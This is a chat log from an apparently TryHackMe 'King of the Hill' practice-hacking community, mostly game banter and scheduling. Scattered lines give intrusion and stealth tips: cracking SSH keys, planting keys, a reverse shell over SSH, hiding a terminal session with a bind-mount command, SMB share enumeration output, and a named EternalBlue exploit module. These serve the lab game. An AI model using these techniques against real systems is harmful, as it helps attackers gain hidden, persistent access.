Yeah I wanna die I spent 20 mins reading and cracking Jordan's ssh key
I have no friends
But I'd be happy to participate if I can
low tulip
Yeah I wanna die I spent 20 mins reading and cracking Jordan's ssh key
feels bad
sinful nest
I have no friends
so why do you say that a koth tournament between friends is sick?
🤷♂️
formal terrace
Well sick like it's awesome
sinful nest
I understood
sinful nest
But I'd be happy to participate if I can
I'm still organizing the event with my friends,it will be on my server, several people will play
formal terrace
That's cool, I didn't realize a tournament was a possibility
I'm still new to this whole thing
low tulip
I'm still organizing the event with my friends,it will be on my server, several ...
let us know when its ready
sinful nest
That's cool, I didn't realize a tournament was a possibility
I understand, I thought like this, if, for example, there are 40 or 30 people participating, it will be 4 or 3 rooms, then whoever wins advances to the next phase, until reaching the end
sinful nest
let us know when its ready
Ok
thick vale
sss
eager vector
yes
pseudo bay
pliant rune
Anyone from current KOTH on?
pliant rune
@solid skiff you here buddy?
solid skiff
<@!612193987251535898> you here buddy?
Now I am.
thick vale
we are
thick vale
@solid skiffhahahah stop man you played every room in koth stop playing it
solid skiff
<@!612193987251535898>hahahah stop man you played every room in koth stop playin...
Just two games and I going offline... 😉
sacred epoch
Ready for KoTH?
low tulip
tmux -S /.dev/session
sacred epoch
Hi guys
exotic hatch
hi
echo gate
Barux what are you doing to make ssh unavailable
this is the second time I've gone against you and the second time ssh has become unavailable
low tulip
this is the second time I've gone against you and the second time ssh has become...
he change the port
echo gate
yeah I connected over the new port
it was 23000 something
the problem was that sometime in the middle of the match I was unable to connect and it's the second time it happened in all my koth games, and the second time it happened with baruX
I might just be stupid but I have never seen that before and I don't know if its allowed
sacred epoch
the problem was that sometime in the middle of the match I was unable to connect...
and when I saw that you try to login in the new port I changed it again
changing ports it's allowed right
echo gate
yeah changing ports is allowed, I do it
i'm not talking about the port changing i'm talking about ssh becoming unavailable
restive void
dusk carbon
echo gate
my b I accidentally took down apache
rapid jacinth
sacred epoch
this is my first Koth dont ruin me
welcome
topaz junco
https://tryhackme.com/games/koth/43804 someone join up
formal terrace
sacred epoch
https://tryhackme.com/games/koth/43804 someone join up
You should send private invitation
tawdry umbra
baruX or tom.wilson here?
devout isle
echo gate
smasher are you also losing connectoin?
not even getting a ping
ok its good now
now it's down ):
upper yoke
.
sinful nest
sinful nest
i fell so lazy today
B(
lone kelp
arctic wharf
-unmute @dusty scarab Please don't ping everyone, bot doesn't like it and it's kinda rude
brittle stirrupBOT
🔊 Unmuted R3TROX#8774
dusty scarab
-unmute <@702756242019450910> Please don't ping everyone, bot doesn't like it an...
oh
sorry
vapid storm
vapid storm
ivory shore
@lime epoch in vc if u can
eternal terrace
is there a spectate link?
ivory shore
Power cut out lol... I guess I'll be back in a bit
Might just tether my phone and laptop if it doesn't come back quick
Wonder how VPN does over mobile network tether 🤔
ivory shore
Don't think I'm gonna make it to this one, I'll come watch in a bit
ivory shore
vapid storm
formal terrace
sure
vapid storm
https://tryhackme.com/games/koth/join/e0da4afd41f72d71522db24c hey, anyone?
only a minute left
formal terrace
it doesn't let me join
vapid storm
it doesn't let me join
it's too late btw u can join this https://tryhackme.com/games/koth/join/f9609e99446604129238123e
formal terrace
ok
low tulip
yo guys
formal terrace
yo
vapid storm
violet meteor
@spiral karma
spiral karma
@low tulip any reason why you're posting random IP addresses please?
low tulip
<@772404051710443520> any reason why you're posting random IP addresses please?
i asked @regal island for help for the CTF ,and i send him the IP of the box
spiral karma
i asked <@652921024526024716> for help for the CTF ,and i send him the IP of the...
I see, okay. Probably best to keep that to DMs please (:
low tulip
I see, okay. Probably best to keep that to DMs please (:
Okey, sorry
spiral karma
People post random IPs that are usually dodgy or they want to recruit others to attack someone, so we're always a bit cautious about it is all
still cape
who needs to play one private KOTH?
low tulip
@spiral karma check DM
lean gull
Can i join?
forest laurel
Can i join?
you need to verify to join voice-chat.
lime epoch
Hello Feathers 👋
spiral valve
Hello!!
echo gate
gg Aquinas, now I know I have to turn off passwords in ssh
cosmic lodge
hmm?
whatcha mean
i typically use a reverse shell over ssh thing that essentually creates its own ssh server - neatly sidesteps all those people who peskily change ports, mess with ssh keys etc 😄
echo gate
yeah but I added my own ssh keys to a few users, but forgot to change the sshd_config file to not ask for passwords
vapid storm
yeah but I added my own ssh keys to a few users, but forgot to change the sshd_c...
It doesn’t require the password if u submitted ur public key in the file named “authorized_keys” in the .ssh folder
echo gate
Then why did it ask me for a password after I did that
I looked it up and there are a few options I need to set so it doesn't ask for a password
rigid mesa
@sinful nest ik u might just be good but u pwned spacejam so fast it rly did look like an autopwn script
it just ruins the game ngl we all waited 25 mins for u to pwn it in less than 2 minutes
if i recall correctly those are illegal to use just so u know
no hate or nothing, just telling you
sinful nest
<@745672959804571742> ik u might just be good but u pwned spacejam so fast it rl...
lol
rigid mesa
how did u do it without an autopwn script loll u must type at lightspeed my man
sinful nest
I'm not using autopwn, spacejam is very simple, just inject a reverse shell and you already have it as root, then just protect
rigid mesa
yeah hahah ik i have a writeup on it dont worry
rigid mesa
wow, friendly
sinful nest
wow, friendly
before you go around accusing, have evidence please, ok buddy?
and it's obvious that I'll know how to make the machine, I've played all the machines and I'm looking for the top 1
if your desire is to cause fights, I'm out friend, I don't waste my time with that
😄
rigid mesa
i really said "looks like", i have a writeup and notes for this one and i still wouldnt have been able to go that fast still, ur just too good for the game ig, thats all i was saying, theres was no hate intended
i was lit saying ur good if this isnt an autopwn and u told me it wasnt
dont get mad at me for that like i dont waste my time with that either
sinful nest
I understand, I thought you were trying to insult me, sorry, it was a mistake on my part
I've been playing koth since 11 am, just so I can reach 400 wins
rigid mesa
it's fine hahah it rly wasnt my intention im not that kind of person dw
rigid mesa
I've been playing koth since 11 am, just so I can reach 400 wins
hahahah keep it up friend thats awesome
wish i had that much time
lone kelp
I've been playing koth since 11 am, just so I can reach 400 wins
u need a break :))
sinful nest
I understand, I'm really sorry friend, I also don't agree with the idea of using autopwn
I'm going to teach you how to defend yourself on linux machines soon, I'm going to put my repository on video
vocal ginkgo
and it's obvious that I'll know how to make the machine, I've played all the mac...
you won't tho, jcegnik's gonna come back when you're 5 games close 
rigid mesa
I understand, I'm really sorry friend, I also don't agree with the idea of usi...
dont be! i get why it could have been misunderstood sry lol
and yeah, me too, thats why im telling u cuz ive seen others do it
sinful nest
wish i had that much time
Thank you very much!! I don't have much time either, but since it's holidays now I have a little time, last year I played straight, but this year not so much anymore
brittle stirrupBOT
Gave +1 Rep to @rigid mesa
rigid mesa
I'm going to teach you how to defend yourself on linux machines soon, I'm going ...
great idea! i did this once on my website with ppl from my old team
sinful nest
u need a break :))
that nothing, I don't stop until I hit 400 win hahaha
rigid mesa
Thank you very much!! I don't have much time either, but since it's holidays now...
ohh okay i get it hahahah
tho i gotta stop talking ive got a box to pwn lolll
sinful nest
~~you won't tho~~, jcegnik's gonna come back when you're 5 games close <:kekw:75...
he is a very nice person, I like him, he is a person who can chat for hours
vocal ginkgo
yeh, I've talked to him too, cool guy
sinful nest
dont be! i get why it could have been misunderstood sry lol
and yeah, me too, th...
I understand, it's ok, it's calm
sinful nest
great idea! i did this once on my website with ppl from my old team
I don't even have a team, but I would like to, it must be cool, I'm thinking of creating a website too, and posting things on it
sinful nest
tho i gotta stop talking ive got a box to pwn lolll
it's all right
rigid mesa
I understand, it's ok, it's calm
hahaha alright, good luck, enjoy!
sinful nest
and sorry for my bad english, i'm brazilian, i'm using the translator
rigid mesa
im canadian french dww
sinful nest
thank you very much, we are with you! if you need help just call me
rigid mesa
I don't even have a team, but I would like to, it must be cool, I'm thinking of ...
yeahh well look around for ppl here and you may find interested ppl
rigid mesa
thank you very much, we are with you! if you need help just call me
ill be fine but if u do sth cool defense-wise i may send you a dm im tryna up my defense skills hahah
thanks!
sinful nest
yeahh well look around for ppl here and you may find interested ppl
Yes, that's a good idea
sinful nest
ill be fine but if u do sth cool defense-wise i may send you a dm im tryna up my...
hahahaha defense is the best part, it's also nice to see the others through the logs to know what they are doing
rigid mesa
hahahaha defense is the best part, it's also nice to see the others through the ...
hahah ive never looked at the logs tho i should next time hehe
thanks for the tip
sinful nest
hahah ive never looked at the logs tho i should next time hehe
hahaha looking at the logs you can also know where they are trying to get shell or some entrypoint, so you just go quickly to the directory and correct the entrypoint
sinful nest
thanks for the tip
xD 🙂
rigid mesa
hahaha looking at the logs you can also know where they are trying to get shell ...
what logs do you look at exactly? cuz i never did on any box
u can tell me after the game if u prefer its just out of curiosity
sinful nest
what logs do you look at exactly? cuz i never did on any box
access.log, auth.log, nginx logs, ftp logs, and so on
rigid mesa
oh okay so literally the services log alrightt thanks!
sinful nest
oh okay so literally the services log alrightt thanks!
yes, we are together!
vapid storm
playing koth ?
sinful nest
playing koth ?
yes
vapid storm
got room ?
vapid storm
ty : )
sinful nest
xD
sinful nest
never played with many people in koth
usually in the morning and in the afternoon the koth is with more people
sinful nest
this is going to be fun
yes
vapid storm
usually in the morning and in the afternoon the koth is with more people
i usually play in private
1v1
sinful nest
i usually play in private
I play private games with my friends too, but we joke around in the living room, it's more to be distracted
vapid storm
3 minutes
pulsar jungle
who did I just kick out? lol
sinful nest
who did I just kick out? lol
I think it was me, but it's ok, I have another session open without showing my pts
rigid mesa
rootkit?
pulsar jungle
lol
rigid mesa
ah alright
sinful nest
you can hide your PTS without rootkit
rigid mesa
i had a friend that did that once he was like unbeatable
rigid mesa
you can hide your PTS without rootkit
aight thanks for the heads up
brittle stirrupBOT
Gave +1 Rep to @sinful nest
sinful nest
it's quite OP, because no one will know you're in the box
sinful nest
aight thanks for the heads up
xD
rigid mesa
i guess!
sinful nest
yes i made a script that hides your current PTS/process
but there's another way to hide your PTS too, it's much more OP for me
if you use mount to hide pts, whoever runs mount will be where your process was mounted, so just use umount
rigid mesa
mount -o bind /dev/null /dev/pts/8 just used that, seems to work
rigid mesa
if you use mount to hide pts, whoever runs mount will be where your process was ...
true
sinful nest
and then just use umount, but if you take the permission of others to use mount and umount is also OP
but there are also other techniques that you can hide the process and pts, and in my opinion I think it's more OP, because mount has this weakness, but even so it's also OP to use mount for hidden process
rigid mesa
thanks man!
rigid mesa
what?
sinful nest
vapid storm
it died for a moment
sinful nest
I understand, so it wasn't my vpn
vapid storm
smbclient -L \\\\10.10.214.183\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HouseKeys Disk
IPC$ IPC Remote IPC
King Disk A script to pull king from the server
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.214.183 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
hollow zephyr
smbclient -H //10.10.214.183/NETLOGON
hollow zephyr
windows/smb/ms17_010_eternalblue
solid skiff
@hollow zephyr , nice... 😉
sinful nest
nice game
vapid storm
GG